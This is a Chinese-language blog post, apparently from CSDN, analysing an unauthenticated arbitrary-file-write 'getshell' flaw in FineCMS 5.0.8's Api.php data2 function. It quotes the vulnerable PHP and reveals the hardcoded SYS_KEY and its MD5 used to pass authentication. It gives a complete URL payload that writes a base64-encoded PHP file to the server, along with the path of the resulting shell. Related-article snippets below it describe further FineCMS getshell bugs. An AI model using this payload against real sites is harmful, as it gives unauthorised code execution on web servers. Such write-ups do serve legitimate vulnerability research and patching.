finecmsV5.0.8 \finecms\dayrui\controllers\Api.php getshell

最新推荐文章于 2023-07-11 17:30:43 发布
最新推荐文章于 2023-07-11 17:30:43 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 漏洞

漏洞在C:\phpStudy\WWW\finecms\dayrui\controllers\Api.php中的data2函数,大约在第115行,有问题的代码大约在178行

public function data2() {

        $data = array();

        // 来路认证
        if (defined('SYS_REFERER') && strlen(SYS_REFERER)) {
            $http = $_SERVER['HTTP_REFERER'] ? $_SERVER['HTTP_REFERER'] : $_GET['http_referer'];
            if (empty($http)) {
                $data = array('msg' => '来路认证失败(NULL)', 'code' => 0);
            } elseif (strpos($http, SYS_REFERER) === FALSE) {
                $data = array('msg' => '来路认证失败(非法请求)', 'code' => 0);
            }
        }

        if (!$data) {
            // 安全码认证
            $auth = $this->input->get('auth');
            if ($auth != md5(SYS_KEY)) {
                // 授权认证码不正确
                $data = array('msg' => '授权认证码不正确', 'code' => 0);
            } else {
                // 解析数据
                $cache = '';
                $param = $this->input->get('param');
                if (isset($param['cache']) && $param['cache']) {
                    $cache = md5(dr_array2string($param));
                    $data = $this->get_cache_data($cache);
                }
                if (!$data) {

                    if ($param == 'login') {
                        // 登录认证
                        $code = $this->member_model->login(
                            $this->input->get('username'),
                            $this->input->get('password'),
                            0, 1);
                        if (is_array($code)) {
                            $data = array(
                                'msg' => 'ok',
                                'code' => 1,
                                'return' => $this->member_model->get_member($code['uid'])
                            );
                        } elseif ($code == -1) {
                            $data = array('msg' => fc_lang('会员不存在'), 'code' => 0);
                        } elseif ($code == -2) {
                            $data = array('msg' => fc_lang('密码不正确'), 'code' => 0);
                        } elseif ($code == -3) {
                            $data = array('msg' => fc_lang('Ucenter注册失败'), 'code' => 0);
                        } elseif ($code == -4) {
                            $data = array('msg' => fc_lang('Ucenter:会员名称不合法'), 'code' => 0);
                        }
                    } elseif ($param == 'update_avatar') {
                        // 更新头像
                        $uid = (int)$_REQUEST['uid'];
                        $file = $_REQUEST['file'];
                        //
                        // 创建图片存储文件夹
                        $dir = SYS_UPLOAD_PATH.'/member/'.$uid.'/';
                        @dr_dir_delete($dir);
                        if (!is_dir($dir)) {
                            dr_mkdirs($dir);
                        }
                        $file = str_replace(' ', '+', $file);
                        if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $file, $result)){
                            $new_file = $dir.'0x0.'.$result[2];
                            if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file)))) {
                                $data = array(
                                    'msg' => '目录权限不足或磁盘已满',
                                    'code' => 0
                                );
                            } else {

其中,首先

$file = $_REQUEST['file'];

获取$file变量

if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $file, $result)){
                            $new_file = $dir.'0x0.'.$result[2];
                            if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file)))) {
                                $data = array(
                                    'msg' => '目录权限不足或磁盘已满',
                                    'code' => 0
                                );
                            }

然后用preg_match函数进行正则匹配,因为$file变量可控,所以$result也是可控的,从而$new_file也是可控的,可以构造为php文件,然后

file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file))))

对$result[1]进行base64解码,然后写入$new_file文件中。显然,是可以任意写文件进行getshell的。

所以,我们要让程序能够运行到这些代码,不能在之前就退出了

要经过

 $auth = $this->input->get('auth');
 if ($auth != md5(SYS_KEY))

SYS_KEY被系统硬编码为24b16fede9a67c9251d3e7c7161c83ac,在C:\phpStudy\WWW\config\system.php中有定义。直接md5加密一次即可绕过

所以最终的payload为

http://localhost:88/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+

无需登录,直接getshell,路径为http://localhost:88/uploadfile/member/0/0x0.php 

AdministratorHack
关注
专栏目录
FineCMS公益版整合2.2和5.0.8
07-06
最新的整合版本,2系列的最终版是2.2
最新版完全开源免费好用的FineCMS
11-09
FineCMS免费版是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中小型站点提供重量级网站建设解决方案,适用于小型站点、企业级网站、新闻内容网站等,个人站长及中小企业的首选建站系统。
技能篇丨FineCMS 5.0.10 多个漏洞详细分析
dfdhxb995397的博客
05-29 1301
今天是一篇关于技能提升的文章,文章中的CMSFineCMS,版本是5.0.10版本的几个漏洞分析,主要内容是介绍漏洞修补前和修补后的分析过程,帮助大家快速掌握该技能。 注:篇幅较长,阅读用时约7分钟。 任意文件上传漏洞 1、漏洞复现 用十六进制编辑器写一个包含一句话木马的图片,去网站注册一个账号,然后到上传头像的地方。 抓包,修改文件后缀名为.php并发包。 ...
account.php,finecmsV5.0.8 \finecms\dayrui\controllers\member\Account.php getshell
weixin_42244017的博客
04-09 137
漏洞在文件C:\phpStudy\WWW\finecms\dayrui\controllers\member\Account.php中的upload函数```public function upload() {// 创建图片存储文件夹$dir = SYS_UPLOAD_PATH.'/member/'.$this->uid.'/';@dr_dir_delete($dir);!is_dir($d...
finecms aip.php漏洞,FineCMS最新版5.0.8两处getshell(附python批量poc脚本)
weixin_36474966的博客
03-11 725
0x01 前言就要被**,美其名曰:比我的web安全研究和代码审计更有前途。当然是选择原谅他啦。先审计finecms去去火,找到六处漏洞,先放两处容易被发现的getshell和对应的两个python脚本0x02 getshell第一处getshell:在C:phpStudyWWWfinecmsdayruicontrollersApi.php中的data2函数,大约在第115行,有问题的代码大约在1...
FineCMS v5.0.7
11-30
FineCMS(简称版或公益版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定
MongoDB Community(mongodb-org-server-5.0.8-1.el7.x86_64.rpm)
05-28
MongoDB Community Server(mongodb-org-server-5.0.8-1.el7.x86_64.rpm)适用于RedHat / CentOS 7.0 MongoDB是一个基于分布式文件存储的数据库。由C++语言编写。旨在为WEB应用提供可扩展的高性能数据存储解决方案。...
zabbix-web-mysql-scl-5.0.8-5.el7.noarch.rpm
12-04
官方离线安装包,亲测可用
spring-web-5.0.8.RELEASE-sources.jar
最新发布
06-17
spring-5.0.8.jar
zabbix-agent-5.0.8-5.el7.x86_64.rpm
12-04
官方离线安装包,亲测可用
spring 5.0.8
09-02
spring 5-x: spring-framework-5.0.8.RELEASE-dist spring-framework-5.0.8.RELEASE-docs spring-framework-5.0.8.RELEASE-schema
spring-context-5.0.8.RELEASE-javadoc.jar
06-17
spring-5.0.8.jar
finecms aip.php漏洞,通杀FineCMS5.0.8及版本以下getshell的漏洞
weixin_32943857的博客
03-11 572
前言跟着上次的finecms,在漏洞时代又找了一个漏洞来审计。但是他改了函数里面的传参,我也弄了一阵子才搞明白这个传参原来需要加密过的参数,还有就是这个远程下载再上传,有个小问题,那篇文章没有说明,等下再系统说下。漏洞详情代码位置和代码位置\finecms\dayrui\controllers\member\Api.php代码public function down_file() {$p = ar...
finecms aip.php漏洞,FineCMS最新getshell漏洞通杀FineCMS5.0.8一下版本 | CN-SEC 中文网
weixin_39610229的博客
03-11 264
摘要在文件finecms/dayrui/controllers/member/Api.php里面有一个down_file函数.可以从远程下载文件到本地服务器.在文件finecms/dayrui/controllers/member/Api.php里面有一个down_file函数.可以从远程下载文件到本地服务器.public function down_file() { $p = ar...
finecms aip.php漏洞,finecmsV5.0.8 \finecms\dayrui\controllers\Api.php getshell
weixin_36303305的博客
03-11 305
漏洞在C:\phpStudy\WWW\finecms\dayrui\controllers\Api.php中的data2函数,大约在第115行,有问题的代码大约在178行```public function data2() {$data = array();// 来路认证if (defined('SYS_REFERER') && strlen(SYS_REFERER)) {$htt...
php ccontroller,FineCMS controllers\ApiController.php 函数downAction 任意文件下载
weixin_28787725的博客
03-10 516
漏洞文件在D:\wamp\www\controllers\ApiController.php中的downAction函数```/*** 下载文件*/public function downAction() {$data = fn_authcode(base64_decode($this->get('file')), 'DECODE');$file = isset($data['finecms...
微擎后台getshell,低权限也可以
sumubaiblog的博客
07-11 5308
比如编辑专题:/web/index.php?这个文件可以编辑html,然后前台会解析成php。改html内容为php
wei php getshell,某开源框架从注入到Getshell
weixin_29294597的博客
04-06 184
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文原创作者:sjy93812,未经许可禁止转载0x00 前言SemCms是一套开源外贸企业网站管理系统,主要用于外贸企业,兼容IE、Firefox 等主流浏览器。SemCms使用vbscript语言编写,结合iis运行。采用国际通用utf-8编码编写。SemCms非常适合在外贸企...
dotnet-hosting-5.0.8-win.exe
05-13
dotnet-hosting-5.0.8-win.exe是一个Windows平台上的.NET Core程序托管器安装文件。该文件是微软公司开发的一个程序库,为.NET Core应用程序提供了运行环境和托管服务。这个文件安装后会生成一些框架文件和DLL文件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值